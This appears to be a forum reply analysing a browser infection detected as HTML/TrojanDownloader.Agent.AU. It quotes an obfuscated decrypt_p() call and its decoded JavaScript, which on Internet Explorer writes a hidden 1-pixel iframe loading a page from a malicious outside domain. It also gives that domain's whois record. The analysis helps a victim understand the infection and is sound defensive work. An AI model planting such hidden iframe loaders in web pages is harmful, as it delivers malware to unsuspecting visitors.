you got scumware on that box
HTML/TrojanDownloader.Agent.AU
do a search for
http://wsfgfdgrtyhgfd.net
Quote:
decrypt_p("rvBcveRszie7mhKLa_OIa_3vigdIhhAcqeO@Yic 786VExeJ7ienLF8OP4rdI9_3vMhKE3M3IpyKzMFwzYrdI9_AZo LKPolVI4yAE6_Kzyh3LHQmviUd@qenL6yKPp49sMiOP4r3Pp49 VJ4JLSeOP4e9QojJ7oSO@MiALFruzphwEk8OviqDLM_K7b6t7f yAIkQ3PMicUFeO@p_wQavmsQeRXu_b7Mh3LHQX7zhAPH8DLMiO I3r3P4et76enItbt@piJzeGuUF8cPaRwPaeJEwTAP_iKUM_wES FwPhytWFSBUfRKPay9@Mi3PJrtzO4c7oSO@fiJ@tb9Wi6t@H@A POiOviFX7odKzxQ3PiyKzf_KztbtWiD1vSLgVThdj2rB23jml1 GucveRszi0v")</script>
This is what is run when the page loads. This calls the decrypt
function and passes it this long string of "garbage".
the decrypt function decodes this into the following javascript program
and inserts it into the web page.
<SCRIPT language="JavaScript">
var browserName=navigator.appName;
if (browserName=="Microsoft Internet Explorer") {
window.status="Done";
document.write('<IFRAME name="PageContainer"
src="http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php" width="1"
height="1" frameborder="0"></IFRAME>');
}
</SCRIPT>
As you can see, the spyware targets only microsoft internet explorer
likely because it has some security flaw the site wants to exploit.
Basically a web page with the decrypt function will set up a small
iframe (1 pixel in size) and load the page at
http://wsfgfdgrtyhgfd.net/adv/077/dffg/index.php
Which is presently recorded as being owned by:
Domain Name: WSFGFDGRTYHGFD.NET
Registrar: ONLINENIC, INC.
Whois Server: whois.OnlineNIC.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS4.ASDBIZ.BIZ
Name Server: NS3.ASDBIZ.BIZ
Status: ACTIVE
EPP Status: ok
Updated Date: 15-Nov-2006
Creation Date: 12-Oct-2006
Expiration Date: 12-Oct-2007
The web server for this domain is presently down so what the iframe was
actually doing is an open question.
But yes, you can assume that the effort to purge the computer of
mal/adware was not 100% effective.
|
and more about it here
http://www.aboutus.org/Wsfgfdgrtyhgfd.net